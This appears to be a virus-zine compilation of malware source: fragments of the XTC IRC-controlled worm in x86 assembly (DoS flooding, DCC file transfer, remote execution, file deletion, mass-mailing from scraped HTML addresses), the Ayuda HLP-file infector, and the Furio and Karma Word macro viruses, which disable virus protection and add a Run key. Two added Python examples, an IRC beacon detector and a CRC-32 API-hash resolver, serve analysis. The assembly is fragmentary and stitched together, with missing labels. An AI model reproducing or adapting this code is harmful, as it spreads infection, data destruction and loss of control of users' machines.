xor eax,eax
@pushsz 'XTC'
push eax
push eax
push offset DOS_Thread
dos_thr:push eax
push eax
call CreateThread ;create separate thread
xchg eax,ecx
jecxz err_dos
push ecx
call CloseHandle ;close its handle
ok_dos: @SEH_RemoveFrame
popad
jmp msg_ok ;reply "ok"
err_dos:@SEH_RemoveFrame
popad
jmp msg_err ;reply "failed"
;logon to MAPI32
mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
call MAPILogon
ret
call mapi_init
test eax,eax
jne e_spr
mov [ebp],ebp
@pushsz 'XTC'
push eax
push eax
push offset SPREAD_Thread
push eax
push eax
call CreateThread ;create separate thread
xchg eax,ecx
jecxz e_spr
push ecx
call CloseHandle ;close its handle
e_spr: @SEH_RemoveFrame
popad
jmp irc_manage ;and quit
push 6
pop ecx
m_loop: push ecx
push 32
@pushsz 'http://www.therainforestsite.com' ;destination URL
push 1
push esi
@pushsz 'Software\Microsoft\Internet Explorer\Main'
push 80000002h ;key
call SHSetValueA ;set the value
@endsz
pop ecx
loop m_loop
popad
jmp msg_ok ;and reply to user
xor ebx,ebx
push ebx
push ebx
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push esi
call CreateFileA ;open the file
inc eax
je err_send0
dec eax
mov [sendFile],eax
push ebx
push eax
call GetFileSize ;get its size
mov [sendBytes],eax
push ebx
push SOCK_STREAM
push AF_INET
call socket ;create socket
inc eax
je err_send1
dec eax
mov [sendSocket],eax
call GetTickCount
push 1000
pop ecx
xor edx,edx
div ecx
add edx,4000
mov [dccPort],edx
push edx
call htons
mov [DCC_sock.sin_port],ax ;select random port
and [DCC_sock.sin_addr],0 ;number
push sockSize
push offset DCC_sock
push 12345678h
sendSocket = dword ptr $-4
call bind ;hook the port
test eax,eax
jne err_send2
mov eax,'CCD1'-'1'+1
stosd
mov eax,'NES '
stosd
mov ax,' D'
stosw
add dword ptr [esp.Pushad_ebp],10 ;create DCC command
mov esi,ebp
cpy_sm: lodsb
stosb
inc dword ptr [esp.Pushad_ebp]
cmp al,20h
jne cpy_sm
mov ebp,edi
call Num2Ascii
mov eax,edi
sub eax,ebp
inc eax
add dword ptr [esp.Pushad_ebp],eax
mov al,20h
stosb
mov ebp,edi
mov eax,12345678h
sendBytes = dword ptr $-4 ;and file size
call Num2Ascii
mov eax,edi
sub eax,ebp
add eax,4
add dword ptr [esp.Pushad_ebp],eax
mov ax,0D01h
stosw
mov al,0Ah
stosb ;terminate the command
mov ecx,[esp.Pushad_ebp]
mov esi,edi
sub esi,ecx
call irc_send ;send it
push 1
push [sendSocket]
call listen ;switch to listen mode
test eax,eax
jne err_send2
push eax
push eax
push [sendSocket]
call accept ;accept incomming bytez
xchg eax,[sendSocket]
push eax
call closesocket ;close incomming socket
push 0
push dword ptr [ebx]
push offset irc_buffer
push [sendSocket]
call send ;send them
add esi,[ebx]
cmp esi,[sendBytes]
je ok_send ;check if we are finished
cmp [ebx],eax
je l_dcc_send
err_send2:
push [sendSocket]
call closesocket ;close the socket
err_send1:
push 12345678h
sendFile = dword ptr $-4
call CloseHandle ;close the file
err_send0:
err_dcc0:
popad
jmp msg_err ;and reply "failed"
ok_send:push [sendSocket]
call closesocket ;close the socket
push [sendFile]
call CloseHandle ;file
popad
jmp msg_ok ;reply "ok"
@endspc
@endspc
push esi
@endspc
mov byte ptr [esi-1],0
pop esi
xor eax,eax
push eax
push eax
push CREATE_ALWAYS
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push esi
call CreateFileA ;create new file
inc eax
je err_dcc0
dec eax
mov [dccFile],eax
push 0
push SOCK_STREAM
push AF_INET
call socket ;create socket
inc eax
je err_dcc1
dec eax
mov [dccSocket],eax
@endsz
push esi
@endspc
mov byte ptr [esi-1],0
pop esi
call Ascii2Num
push eax
call htonl
mov [DCC_sock.sin_addr],eax ;get IP
inc esi
call Ascii2Num
push eax
call htons
mov [DCC_sock.sin_port],ax ;port
inc esi
call Ascii2Num
xchg eax,ebx
push sockSize
push offset DCC_sock
push [dccSocket]
call connect ;connect to remote machine
inc eax
je err_dcc2
xor esi,esi
dcc_recv_loop:
push 0
push 1000h
push offset irc_buffer
push [dccSocket]
call recv ;get incomming bytez
inc eax
je err_dcc2
dec eax
sub ebx,eax
add esi,eax
push 0
call @tmp
dcctmp dd ?
@tmp: push eax
push offset irc_buffer
push [dccFile]
call WriteFile ;write them to file
push esi
call htonl
mov ecx,offset dcctmp
mov [ecx],eax
push 0
push 4
push ecx
push [dccSocket] ;send number of
call send ;recieved bytez
test ebx,ebx
jne dcc_recv_loop ;are we finished?
err_dcc1:
call dcc_closefile ;close the file
jmp err_dcc0 ;and quit
err_dcc2:
call dcc_closesock ;disconnect
jmp err_dcc1 ;and quit
dcc_closefile:
push 12345678h
dccFile = dword ptr $-4
call CloseHandle ;close the file
ret
dcc_closesock:
push 12345678h
dccSocket = dword ptr $-4
call closesocket ;disconnect
ret
push 0
push esi
push offset wormname2
call CopyFileA ;copy the worm
push esi
push edi
mov esi,ebp
mov edi,offset temppath
mov edx,edi
@copysz
dec edi
mov eax,'niw\'
stosd
mov eax,'ini.'
stosd
xor al,al
stosb
pop edi
pop esi
inc [lan_res]
push edx
push edi
@pushsz 'run'
push offset win_table+3
call WritePrivateProfileStringA ;modify win.ini
pop ecx
dec byte ptr [lan_drive]
dec ecx
test ecx,ecx
jne ld_lan ;try another disk drive
mov ecx,12345678h
lan_res = dword ptr $-4
jecxz err_lan
popad
jmp msg_ok
err_lan:popad
jmp msg_err
push edi
call gethostbyname ;convert it to IP
xchg eax,ecx
jecxz err_who
mov eax,[ecx+HOSTENT_IP]
mov eax,[eax]
cmp eax,ebx
jne err_who ;reply if matches
popad
jmp msg_ok
err_who:popad
jmp irc_manage
xor eax,eax
push offset pInfo
push offset sInfo
push eax
push eax
push eax
push eax
push eax
push eax
push esi
push eax
call CreateProcessA ;execute it!
mov [esp.Pushad_eax],eax
push [pInfo.hThread]
call CloseHandle
push [pInfo.hProcess]
call CloseHandle ;close all handlez
popad
dec eax
je msg_ok
jmp msg_err
;copies file
irc_COPY:
@endspc
push ecx
push edx
push 0
push esi
push esi
l_copy1:lodsb
cmp al,20h
jne l_copy1
mov byte ptr [esi-1],0
mov [esp+4],esi
@endbr
mov byte ptr [esi-1],0
call CopyFileA
jmp md_dir
;moves/renames file
irc_MOVE:
@endspc
push ecx
push edx
push esi
push esi
l_move1:lodsb
cmp al,20h
jne l_move1
mov byte ptr [esi-1],0
mov [esp+4],esi
@endbr
mov byte ptr [esi-1],0
call MoveFileA
jmp md_dir
;removes file
irc_DEL:@endspc
push ecx
push edx
push esi
push FILE_ATTRIBUTE_NORMAL
push esi
@endbr
mov byte ptr [esi-1],0
call SetFileAttributesA ;blank attributez
test eax,eax
pop ecx
je md_dir
push ecx
call DeleteFileA ;and delete the file
jmp md_dir
;removes directory
irc_RD: @endspc
push ecx
push edx
push esi
@endbr
mov byte ptr [esi-1],0
call RemoveDirectoryA
jmp md_dir
;creates directory
irc_MD: @endspc
push ecx
push edx
push 0
push esi
@endbr
mov byte ptr [esi-1],0
call CreateDirectoryA
jmp md_dir
wr_dir: pushad
mov esi,offset temppath+WFD_szFileName
@l_dir: lodsb
inc ecx
stosb
test al,al
jne @l_dir
dec edi
mov word ptr [edi],0A0Dh
inc ecx
mov esi,[esp.Pushad_edx]
call irc_send ;send the filname
push offset temppath
push [fHandle]
call FindNextFileA ;find another
dec eax
popad
je wr_dir
pushad
push 12345678h
fHandle = dword ptr $-4
call FindClose ;close search handle
popad
jmp msg_ok
irc_manage EndP
;input:
;ECX - size of data to send
;ESI - ptr to data to send
irc_send Proc
push 0
push ecx
push esi
push [hSocket]
call send
xchg eax,ecx
ret
irc_send EndP
irc_recv_100h:
mov ecx,100h
;ECX - size of data to recieve
;output: ESI - ptr to buffer
irc_recv Proc
push edi
push ecx
mov esi,offset irc_buffer
push esi
l_recv: push 0
push 1
push esi
push [hSocket]
call recv
mov dl,[esi]
inc esi
cmp dl,0Ah
jne l_recv
pop esi
pop ecx
pop edi
ret
irc_recv EndP
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
CRC32 EndP
push 10
pop ecx
g_str: xor edx,edx
div ecx
add edx,'0'
xchg eax,edx
stosb
xchg eax,edx
test eax,eax
jne g_str
pop esi
xchg esi,edi
dec esi
cpy_num:std
lodsb
cld
stosb
cmp al,11h
jne cpy_num
dec edi
pop esi
ret
Num2Ascii EndP
push sockSize
push offset DOS_sock
push ebx
call connect ;connect there
inc eax
je n_dos
push sockSize
push offset DOS_sock
push ebp
call connect ;--- "" ---
inc eax
je n_dos
push 0
push 1000h
push offset irc_buffer
push ebx
call send ;send there some data
push 0
push 1000h
push offset irc_buffer
push ebp
call send ;--- "" ---
mov ecx,12345678h
dos_sem = dword ptr $-4 ;quit if the semaphore
jecxz end_dos ;is cleared
jmp do_dos
end_dos:popad
SVCHandler:
ret
DOS_Thread EndP
push edi
call SetCurrentDirectoryA ;go to there
dec eax
jne end_spread
push eax
call SetCurrentDirectoryA ;go to that directory
push esi
call FindClose ;close the search handle
jmp b_dir
push esi
call FindClose ;close the search handle
end_dir:push edi
@pushsz '*.*htm*'
call FindFirstFileA ;find first *.*htm* file
inc eax
je end_spread
dec eax
xchg eax,esi
p_htmlz:mov ecx,0
spread_sem = dword ptr $-4
jecxz end_spread2 ;check the semaphore
call parse_html ;search inside html file
;and find there mail
;address and send itself
push edi ;to there
push esi
call FindNextFileA ;find next file
dec eax
je p_htmlz
end_spread2:
push esi
call FindClose ;close search handle
end_spread:
popad
ret
parse_html:
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push offset temppath+WFD_szFileName
call CreateFileA ;open the file
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 0
push ebx
call GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt: pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
call UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
call CloseHandle ;close file mapping
ph_close:
push ebx
call CloseHandle ;close the file
popad
ret
scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char: lodsb
cmp al,' '
je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_char
s_char: inc esi
jmp n_char
e_char: xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')
call mapi_send
jmp ls_scan_mail
SPREAD_Thread EndP
push 0
call ExitThread ;quit the thread
service_start:
pushad
@SEH_SetupFrame <jmp end_worm>
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set the service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and continue...
SVCRegister EndP
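The IRC handling in the XTC source above (irc_manage, irc_send, irc_recv and the DCC send/receive code) speaks a small bot protocol over ordinary IRC: a PONG for every PING, a JOIN to #xtcdan, a "!ver0001" version beacon sent as PRIVMSG, an "update" command that fetches a new copy over FTP, and CTCP DCC SEND offers of xtcspawn.exe. What a defender wants from that listing is the traffic shape, so the following is an added example, not code from the zine or from the worm: an RFC 1459 line parser and a classifier that flags those indicators in a captured IRC session. The capture lines are constructed; the indicators themselves come from the listing.

```python
# Added example (not part of the XTC source above): parse raw IRC lines and flag the
# bot-protocol traffic a network sensor or IRC server log would show. Sample lines are
# constructed; the indicators (#xtcdan, "!ver" beacon, "update " command, DCC SEND of
# xtcspawn.exe) come from the source listing.
import re
from typing import List, NamedTuple, Optional, Tuple


class IrcMessage(NamedTuple):
    prefix: Optional[str]   # "nick!user@host" or server name, None if absent
    command: str            # e.g. "PRIVMSG", "PING"
    params: List[str]       # middle params plus the trailing ":" param, if any


def parse_irc_line(line: str) -> IrcMessage:
    """Split one RFC 1459 line into prefix, command and params."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if sep:
        parts.append(trailing)
    if not parts:
        return IrcMessage(prefix, "", [])
    return IrcMessage(prefix, parts[0].upper(), parts[1:])


BEACON_RE = re.compile(r"^!ver\d{4}$")   # worm sends "PRIVMSG #xtcdan :!ver0001"
CTCP_DCC_SEND = "\x01DCC SEND "          # built byte by byte in the DCC send code


def classify(msg: IrcMessage) -> Optional[str]:
    """Return an alert label for a suspicious PRIVMSG, or None for benign traffic."""
    if msg.command != "PRIVMSG" or len(msg.params) < 2:
        return None
    target, text = msg.params[0], msg.params[1]
    if BEACON_RE.match(text):
        return f"bot-version-beacon to {target}"
    if text.startswith("update "):       # irc_manage compares for "update "
        return f"bot-update-command from {msg.prefix}"
    if text.startswith(CTCP_DCC_SEND):
        tokens = text.strip("\x01").split()
        filename = tokens[2] if len(tokens) > 2 else "?"
        return f"dcc-send-offer {filename} to {target}"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run classify over a capture; returns (line number, alert) pairs."""
    alerts = []
    for n, raw in enumerate(lines, 1):
        label = classify(parse_irc_line(raw))
        if label:
            alerts.append((n, label))
    return alerts


# Constructed capture: an idle server PING, the worm's beacon, an operator pushing an
# update, a DCC SEND offer of the dropped file, and ordinary chat.
SAMPLE_LINES = [
    "PING :irc.example.invalid",
    ":xtc!u@host PRIVMSG #xtcdan :!ver0001",
    ":op!u@host PRIVMSG xtcbot :update ftp.example.invalid user pass",
    ":xtc!u@host PRIVMSG op :\x01DCC SEND xtcspawn.exe 3232235777 4123 12345\x01",
    ":alice!u@host PRIVMSG #chat :hello everyone",
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE_LINES):
        print(f"line {n}: {label}")
```

The parser keeps the trailing parameter whole, which is what matters here: the beacon, the command text and the CTCP payload all arrive as the last parameter of a PRIVMSG, so a detector that split on every space would lose the DCC SEND fields.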
.486p
.model flat
locals
extrn ExitProcess:PROC
HLPHEADER struc
hhMagic dd ?
hhDirectoryStart dd ?
hhNonDirectoryStart dd ?
hhEntireFileSize dd ?
HLPHEADER ends
HLPFILEHEADER struc
fhReservedSpace dd ?
fhUsedSpace dd ?
fhFileFlags db ?
HLPFILEHEADER ends
BTREEHEADER struct
bthMagic dw ?
bthFlags dw ?
bthPageSize dw ?
bthStructure db 10h dup(?)
bthMustBeZero dw ?
bthPageSplits dw ?
bthRootPage dw ?
bthMustBeNegOne dw ?
bthTotalPages dw ?
bthNLeves dw ?
bthTotalEntries dd ?
BTREEHEADER ends
.DATA
.CODE
inicio:
push eax ; simulate the callback for
push eax ; 1st generation
push offset goOut
sub esp,((vSize/2)+1)*2 ; why i'm doing this? ;)
jmp virusBegin
goOut:
push 0h
call ExitProcess
lodsd
add eax,K32WIN9X
mov dword ptr [address+ebp],eax
lodsd
add eax,K32WIN9X
mov dword ptr [names+ebp],eax
lodsd
add eax,K32WIN9X
mov dword ptr [ordinals+ebp],eax
sub esi,16
lodsd
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
searchl:
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,K32WIN9X
push eax edx
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je quitSEH
jmp searchl
fFound:
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,K32WIN9X
mov dword ptr [eax+5],ecx
add eax,9
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea ecx,ENDAPI+ebp
cmp eax,ecx
jb searchl
findNext:
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
mov ecx,PADDING ; test if it's infected
xor edx,edx ; yet
div ecx
or edx,edx ; reminder is zero?
jz skipThisFile
lea esi,find_data.cFileName+ebp
call infect
skipThisFile:
lea esi,find_data+ebp
push esi
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp] ; Find next file
or eax,eax
jnz findNext
quitSEH:
xor esi,esi ; quit SEH
pop dword ptr fs:[esi]
pop eax
popad
add esp,((vSize/2)+1)*2 ; fix stack
xor eax,eax ; return FALSE
ret 8 ; pop the args of the call
; (are two: 2*4=8 bytes)
exception:
xor esi,esi ; we are not under
mov eax,dword ptr fs:[esi] ; win9x... a pitty
mov esp,dword ptr [eax]
jmp quitSEH
;
; does the hlp infection
; IN: esi addr of file name
;
infect:
xor eax,eax
push eax
push 80h
push 3h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp]
inc eax
jz errorOut
dec eax
xor eax,eax
push eax
push eax
push eax
push 4h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jc errorOutClose
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [mfHnd+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz errorOutCloseMap
; get file size information in the header (not the same than
; 'file in disk' size)
mov ecx,dword ptr [eax.hhEntireFileSize]
mov dword ptr [fileSize+ebp],ecx
searchSystemDir:
cmp dword ptr [edi],'SYS|'
je foundSystemDir
inc edi
loop searchSystemDir
jmp notNiceHlp
foundSystemDir:
; as i only infect non-indexed hlp files, i'm sure the
; data that follows the |SYSTEM zstring is the offset of
; the directory. 1st skip the zstring
add edi,8
; now goto to the directory (offset from hlp header)
; and set the new system directory at the end of file
mov esi,dword ptr [fileSize+ebp]
xchg esi,dword ptr [edi]
mov edi,esi
add edi,eax
; check version
mov esi,edi
add esi,0ch
cmp word ptr [edi+2],10h
ja noTitleHere
bufferOk:
mov dword ptr [mHnd+ebp],eax
popad
macroDoneFix:
mov al,0b0h
mov ah,90h
stosw
mov ax,5066h
stosw
macroDone:
; end the macro
lea esi,hlpMacro1+ebp
mov ecx,hlpMacroSize1
rep movsb
push eax
call dword ptr [_UnmapViewOfFile+ebp]
xor eax,eax
push eax
push dword ptr [padSize+ebp]
push eax
push 4h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jc errorOutClose
xor eax,eax
push dword ptr [padSize+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [mfHnd+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz errorOutCloseMap
push eax
push 00008000h
push 0h
push dword ptr [mHnd+ebp]
call dword ptr [_VirtualFree+ebp]
pop eax
notNiceHlp:
push eax
call dword ptr [_UnmapViewOfFile+ebp]
errorOutCloseMap:
push dword ptr [mfHnd+ebp]
call dword ptr [_CloseHandle+ebp]
errorOutClose:
push dword ptr [fHnd+ebp]
call dword ptr [_CloseHandle+ebp]
errorOut:
ret
;
; CRC32
;
; IN: esi offset of data to do CRC32
; edi size to do CRC32
;
; OUT:
; eax CRC32
;
; Original routine by Vecna. Gracias!
; This is one of these piezes of code that became essential to
; the virus coder.
;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
copyright db '< AYUDA! Coded by Bumblebee/29a >'
messForAvers db 0dh,0ah
db 'Cumpliendo con mi oficio',0dh,0ah
db 'piedra con piedra, pluma a pluma,',0dh,0ah
db 'pasa el invierno y deja',0dh,0ah
db 'sitios abandonados',0dh,0ah
db 'habitaciones muertas:',0dh,0ah
db 'yo trabajo y trabajo,',0dh,0ah
db 'debo substituir tantos olvidos,',0dh,0ah
db 'llenar de pan las tinieblas,',0dh,0ah
db 'fundar otra vez la esperanza.',0dh,0ah
CrcMapViewOfFile dd 0797b49ech
size1 db 14
_MapViewOfFile dd 0
CrcCreatFileMappingA dd 096b2d96ch
size2 db 19
_CreateFileMappingA dd 0
CrcUnmapViewOfFile dd 094524b42h
size3 db 16
_UnmapViewOfFile dd 0
CrcCloseHandle dd 068624a9dh
size4 db 12
_CloseHandle dd 0
CrcFindFirstFileA dd 0ae17ebefh
size5 db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
size6 db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
size7 db 10
_FindClose dd 0
CrcVirtualAlloc dd 04402890eh
size8 db 13
_VirtualAlloc dd 0
CrcVirtualFree dd 02aad1211h
size9 db 12
_VirtualFree dd 0
ENDAPI label byte
; several handles
fHnd dd 0
mfHnd dd 0
mHnd dd 0
; to store... erm
fileSize dd 0
; file size with padding
padSize dd 0
; the size of the generated system file
systemSize dd 0
; used into API search
address dd 0
names dd 0
ordinals dd 0
nexports dd 0
expcount dd 0
; for find files
hlpMask db '*.hlp',0,0
findHnd dd 0
find_data WIN32_FIND_DATA <?>
ends
end inicio
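The CRC32 Proc in the XTC source and the CRC32 routine credited to Vecna in the Ayuda source above are the same bit-serial CRC-32: running value in dx:cx initialised to 0FFFFFFFFh, each input byte xored into cl, eight shift steps applying the reflected polynomial 0EDB88320h (bx:ax), then a final NOT. Ayuda's search loop hashes every kernel32 export name with it and compares against the table that follows (CrcMapViewOfFile ... CrcVirtualFree); each table entry carries a length one larger than the name, so the hash covers the terminating NUL. The following is an added example, not code from either listing: the same CRC-32 in Python, cross-checked against zlib, plus a resolver that turns such a hash table back into export names, which is how an analyst recovers hidden imports. The candidate export list is a constructed subset; a real run would feed every name from kernel32.dll's export table.

```python
# Added example (not code from the zine): the CRC-32 both listings compute, written out
# in Python, plus a resolver for Ayuda's hash table. The candidate list is constructed.
import zlib

POLY = 0xEDB88320  # the routine xors 0EDB8h into bx and 8320h into ax on each carry


def crc32_bitwise(data: bytes) -> int:
    """Bit-serial CRC-32 exactly as the assembly does it: start at 0xFFFFFFFF, xor
    each byte into the low byte, shift that byte right 8 times applying POLY on carry
    (bx:ax), xor it into the right-shifted running value (dx:cx), finish with NOT."""
    crc = 0xFFFFFFFF
    for byte in data:
        x = (crc ^ byte) & 0xFF          # "xor al,cl"
        for _ in range(8):               # "shr bx,1 / rcr ax,1 / jnc NoCRC / xor ..."
            x = (x >> 1) ^ POLY if x & 1 else x >> 1
        crc = (crc >> 8) ^ x             # "mov cl,ch / mov ch,dl / mov dl,dh", then xor
    return crc ^ 0xFFFFFFFF              # "not edx / not ecx"


def matches_zlib(data: bytes) -> bool:
    """Cross-check against zlib's table-driven CRC-32 (same polynomial and conventions)."""
    return crc32_bitwise(data) == (zlib.crc32(data) & 0xFFFFFFFF)


# Ayuda's table, copied from the listing: (hash, length). The length is the name
# length plus one, so the hash covers the terminating NUL as well.
AYUDA_TABLE = [
    (0x797B49EC, 14), (0x96B2D96C, 19), (0x94524B42, 16), (0x68624A9D, 12),
    (0xAE17EBEF, 15), (0xAA700106, 14), (0xC200BE21, 10), (0x4402890E, 13),
    (0x2AAD1211, 12),
]

# Constructed candidate list (a subset of kernel32 exports).
CANDIDATE_EXPORTS = [
    "MapViewOfFile", "CreateFileMappingA", "UnmapViewOfFile", "CloseHandle",
    "FindFirstFileA", "FindNextFileA", "FindClose", "VirtualAlloc", "VirtualFree",
    "CreateFileA", "GetTickCount", "WinExec",
]


def api_hash(name: str) -> int:
    """Hash an export name the way the search loop does: over the name and its NUL."""
    return crc32_bitwise(name.encode("ascii") + b"\0")


def resolve(table, candidates):
    """Map each (hash, length) entry to the candidate name with that hash and length,
    or None when no candidate matches."""
    by_key = {(api_hash(n), len(n) + 1): n for n in candidates}
    return {h: by_key.get((h, length)) for h, length in table}


if __name__ == "__main__":
    for h, name in resolve(AYUDA_TABLE, CANDIDATE_EXPORTS).items():
        print(f"{h:08x} -> {name or 'unresolved'}")
```

Running the script prints one line per table entry; an entry that stays unresolved means either the candidate list is missing the name or the table value was hashed over something other than name plus NUL, which is itself useful to know when the hashing scheme of a sample is being worked out.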
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FURIO.TXT]ÄÄÄ
Furio Word Macro Virus
Version(s) v1.00
Virus Description : The Furio virus does not infect the Normal template at all, and
it does not rely on Auto macros to spread; this makes it very different from the
common macro virus. When an infected document is run, the virus sets all of the
Word virus protection/security settings to their lowest. It then registers the
computer username as "The WalruS", exports its macro code to C:\Windows\Furio.drv
and sets this file as hidden, then exports its UserForm to
"C:\Windows\AboutFrm.Frm". The virus then checks whether it is installed by seeing
if the file "C:\Program Files\Microsoft Office\Office\STARTUP\Furio.dot" exists
and, if not, installs itself. It does this by opening the Normal template as a
document, infecting it with the exported macros and UserForm, saving it as
"C:\Program Files\Microsoft Office\Office\STARTUP\Furio.dot" and closing it. All
of the above is done on AutoClose. The Normal template is not infected and
therefore does not increase in size. Furio.dot is now loaded every time Word is
opened, because it sits in the Word StartUp folder.
To infect documents, Furio.dot hooks the FileOpen, FileSave and FilePrintDefault
macros. They behave as normal, but they also infect and save the active document
if the marker text "' Furio" is not present on line 1 of the code.
Sub SpreadTheWord()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Furio").CodeModule.Lines(1, 1) <> "' Furio" Then
ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\Furio.drv")
ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\AboutFrm.frm")
ActiveDocument.Save
End If
End Sub
Sub FileOpen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call SpreadTheWord
End Sub
Sub FileSave()
On Error Resume Next
Call SpreadTheWord
ActiveDocument.Save
End Sub
Sub FilePrintDefault()
On Error Resume Next
Call SpreadTheWord
If Second(Now) = 59 Then Selection.TypeText " Please Select Help About For More Information!"
ActiveDocument.PrintOut
End Sub
Sub Payload()
On Error Resume Next
Options.BlueScreen = True
MyApp = Shell("notepad.exe", 1)
SendKeys "Hello there!~~Im the WalruS. Welcome To My New Creation - Furio~~~///0-0\\\ WalruS 09/00", True
AppActivate (MyApp)
End Sub
Sub HelpAbout()
On Error Resume Next
AboutFrm.Show
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Version(s) v1.00
Number of Macros : 2
Virus Description : The Karma virus first checks whether the active document is
called Document1. If it is, it doesn't infect; this prevents the virus from trying to
infect when Word is run without a document. When a document is run, the virus sets all
of the Word virus protection/security settings to their lowest. It then exports its
macro code to C:\Windows\Karma.drv and sets this file as hidden. It then imports this
code into the Normal template and the active document. Next, the virus drops a VBS
file, "C:\Windows\Backup.vbs", and sets it as a hidden file. The VBS file is run at
boot of the PC by using the same registry value as Norton 2000 AV Auto-Protect, thus
disabling anti-virus protection on the PC should Norton be installed. All of the above
happens on AutoOpen.
When the infected document is closed, the virus creates a counter in the win.ini
file. This counter is document specific: every infected document opened and closed in
Word on the user's PC has its own counter in win.ini, and the counter's name contains
the document's directory to ensure that it is document specific. Next, the virus checks
whether the value of the counter is greater than 250. If it is, the contents of the
document are erased and overwritten with the message "This Document has expired due to
Bad Karma", in the "Space Woozies" font, size 100, bold. Finally, the virus checks
whether the document has been saved and, if not, saves it. All of the above happens on
AutoClose.
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayStatusBar = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Norton Auto-Protect") = "C:\Windows\Backup.vbs"
End Sub
